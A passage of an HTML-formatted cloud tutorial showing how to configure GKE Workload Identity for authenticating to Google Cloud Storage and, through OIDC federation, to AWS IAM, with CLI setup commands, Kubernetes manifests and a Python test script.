&lt;span class="c"&gt;#  --workload-pool=${PROJECT_ID}.svc.id.goog&lt;/span&gt;

&lt;span class="c"&gt;# 2. Create GCP Service Account&lt;/span&gt;
gcloud iam service-accounts create gke-cross-cloud-sa &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--display-name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"GKE Cross Cloud Service Account"&lt;/span&gt;

&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"gke-cross-cloud-sa@&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;.iam.gserviceaccount.com"&lt;/span&gt;

&lt;span class="c"&gt;# 3. Create GCS bucket&lt;/span&gt;
gcloud storage buckets create gs://gke-cross-cloud &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--project&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--location&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;us-central1 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--uniform-bucket-level-access&lt;/span&gt;

&lt;span class="c"&gt;# 4. Grant GCS permissions to service account&lt;/span&gt;
gcloud projects add-iam-policy-binding &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--member&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"serviceAccount:&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"roles/storage.admin"&lt;/span&gt;

gsutil iam ch serviceAccount:&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;:objectViewer gs://gke-cross-cloud

&lt;span class="c"&gt;# 5. Bind Kubernetes SA to GCP SA&lt;/span&gt;
gcloud iam service-accounts add-iam-policy-binding &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt; roles/iam.workloadIdentityUser &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--member&lt;/span&gt; &lt;span class="s2"&gt;"serviceAccount:&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;.svc.id.goog[default/gke-cross-cloud-sa]"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Kubernetes Manifest:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Submit the manifest below to validate the Scenario 3.1, if authentication is working you will see success logs as shown below -&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# scenario3-1-gke-to-gcp.yaml&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ServiceAccount&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gke-cross-cloud-sa&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
  &lt;span class="na"&gt;annotations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;iam.gke.io/gcp-service-account&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gke-cross-cloud-sa@YOUR_PROJECT_ID.iam.gserviceaccount.com&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gke-gcp-test&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;serviceAccountName&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gke-cross-cloud-sa&lt;/span&gt;
  &lt;span class="na"&gt;restartPolicy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Never&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gcp-test&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;python:3.11-slim&lt;/span&gt;
    &lt;span class="na"&gt;command&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;sh&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;-c&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
        &lt;span class="s"&gt;pip install --no-cache-dir google-auth google-cloud-storage &amp;amp;&amp;amp; \&lt;/span&gt;
        &lt;span class="s"&gt;python /app/test_gcp_from_gke.py&lt;/span&gt;
    &lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;GCP_PROJECT_ID&lt;/span&gt;
      &lt;span class="c1"&gt;# Replace with your actual project ID&lt;/span&gt;
      &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;YOUR_PROJECT_ID"&lt;/span&gt;
    &lt;span class="na"&gt;volumeMounts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-code&lt;/span&gt;
      &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/app&lt;/span&gt;
  &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-code&lt;/span&gt;
    &lt;span class="na"&gt;configMap&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gcp-test-code-gke&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ConfigMap&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gcp-test-code-gke&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;data&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;test_gcp_from_gke.py&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
    &lt;span class="s"&gt;# Code will be provided below&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Test Code (Python):&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# test_gcp_from_gke.py
&lt;/span&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;google.cloud&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;storage&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;google.auth&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;default&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;sys&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;test_gcp_access&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;Test GCP GCS access using native GKE Workload Identity&lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
    &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="c1"&gt;# Automatically uses workload identity
&lt;/span&gt;        &lt;span class="n"&gt;credentials&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;project&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;default&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

        &lt;span class="n"&gt;storage_client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;storage&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;Client&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;credentials&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;credentials&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;project&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;environ&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;GCP_PROJECT_ID&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# List buckets
&lt;/span&gt;        &lt;span class="n"&gt;buckets&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;list&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;storage_client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;list_buckets&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_results&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;✅ GCP Authentication successful!&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Found &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;buckets&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; GCS buckets:&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;bucket&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;buckets&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;  - &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;bucket&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;🔐 Authenticated with project: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;project&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;True&lt;/span&gt;
    &lt;span class="k"&gt;except&lt;/span&gt; &lt;span class="nb"&gt;Exception&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;❌ GCP Authentication failed: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;traceback&lt;/span&gt;
        &lt;span class="n"&gt;traceback&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;print_exc&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;False&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;__main__&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;test_gcp_access&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Success Logs:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;If you see logs like below for the pod &lt;code&gt;kubectl logs -f -n default gke-gcp-test&lt;/code&gt;, it means the GKE to GCP Authentication worked.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;✅ GCP Authentication successful!
Found &amp;lt;number&amp;gt; GCS buckets:
  - bucket-1
  - bucket-2
  - gke-cross-cloud
  - ...

🔐 Authenticated with project: YOUR_PROJECT_ID
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  3.2 Authenticating to AWS from GKE
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Cross-Cloud Authentication Flow:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl67wwteu1ud1jry62uzf.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl67wwteu1ud1jry62uzf.png" alt="gke to aws" width="800" height="495"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Setup Steps:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# 1. Get GKE OIDC provider URL&lt;/span&gt;
&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;gcloud config get-value project&lt;span class="si"&gt;)&lt;/span&gt;
&lt;span class="nv"&gt;CLUSTER_LOCATION&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"us-central1"&lt;/span&gt;  &lt;span class="c"&gt;# Change to your cluster location (region or zone)&lt;/span&gt;

&lt;span class="c"&gt;# Get the full OIDC issuer URL&lt;/span&gt;
&lt;span class="nv"&gt;OIDC_ISSUER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;curl &lt;span class="nt"&gt;-s&lt;/span&gt; https://container.googleapis.com/v1/projects/YOUR_PROJECT_ID/locations/us-central1/clusters/my-gke-cluster/.well-known/openid-configuration | jq &lt;span class="nt"&gt;-r&lt;/span&gt; .issuer&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"OIDC Issuer: &lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_ISSUER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;

&lt;span class="c"&gt;# 2. Create OIDC provider in AWS&lt;/span&gt;
&lt;span class="nb"&gt;export &lt;/span&gt;&lt;span class="nv"&gt;AWS_PROFILE&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&amp;lt;&lt;span class="nb"&gt;set &lt;/span&gt;to aws profile where you want to create this&amp;gt;

&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="nv"&gt;$OIDC_ISSUER&lt;/span&gt; | &lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="s2"&gt;"s/^https:&lt;/span&gt;&lt;span class="se"&gt;\/\/&lt;/span&gt;&lt;span class="s2"&gt;//"&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# Extract hostname for thumbprint&lt;/span&gt;
&lt;span class="nv"&gt;OIDC_HOST&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="nv"&gt;$OIDC_ISSUER&lt;/span&gt; | &lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="s1"&gt;'s|https://||'&lt;/span&gt; | &lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="s1"&gt;'s|/.*||'&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# Get the thumbprint&lt;/span&gt;
&lt;span class="nv"&gt;THUMBPRINT&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; | openssl s_client &lt;span class="nt"&gt;-servername&lt;/span&gt; &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_HOST&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="nt"&gt;-connect&lt;/span&gt; &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_HOST&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;:443 &lt;span class="nt"&gt;-showcerts&lt;/span&gt; 2&amp;gt;/dev/null &lt;span class="se"&gt;\&lt;/span&gt;
  | openssl x509 &lt;span class="nt"&gt;-fingerprint&lt;/span&gt; &lt;span class="nt"&gt;-sha1&lt;/span&gt; &lt;span class="nt"&gt;-noout&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  | &lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="s1"&gt;'s/SHA1 Fingerprint=//;s/://g'&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"Thumbprint: &lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;THUMBPRINT&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;

&lt;span class="c"&gt;# Create the OIDC provider in AWS&lt;/span&gt;
aws iam create-open-id-connect-provider &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--url&lt;/span&gt; &lt;span class="nv"&gt;$OIDC_ISSUER&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--client-id-list&lt;/span&gt; sts.amazonaws.com &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--thumbprint-list&lt;/span&gt; &lt;span class="nv"&gt;$THUMBPRINT&lt;/span&gt;

&lt;span class="c"&gt;# 3. Create trust policy&lt;/span&gt;
&lt;span class="nv"&gt;YOUR_AWS_ACCOUNT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;aws sts get-caller-identity | jq &lt;span class="nt"&gt;-r&lt;/span&gt; .Account&lt;span class="si"&gt;)&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; gke-aws-trust-policy.json &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt;
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;YOUR_AWS_ACCOUNT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;:oidc-provider/&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;:sub": "system:serviceaccount:default:gke-cross-cloud-sa",
          "&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;:aud": "sts.amazonaws.com"
        }
      }
    }
  ]
}
&lt;/span&gt;&lt;span class="no"&gt;EOF

&lt;/span&gt;&lt;span class="c"&gt;# 4. Create IAM role&lt;/span&gt;
aws iam create-role &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role-name&lt;/span&gt; gke-to-aws-role &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--assume-role-policy-document&lt;/span&gt; file://gke-aws-trust-policy.json

&lt;span class="c"&gt;# 5. Attach permissions&lt;/span&gt;
aws iam attach-role-policy &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role-name&lt;/span&gt; gke-to-aws-role &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--policy-arn&lt;/span&gt; arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Kubernetes Manifest:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Submit the manifest below to validate the Scenario 3.2, if authentication is working you will see success logs as shown below -&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# scenario3-2-gke-to-aws.yaml&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gke-aws-test&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
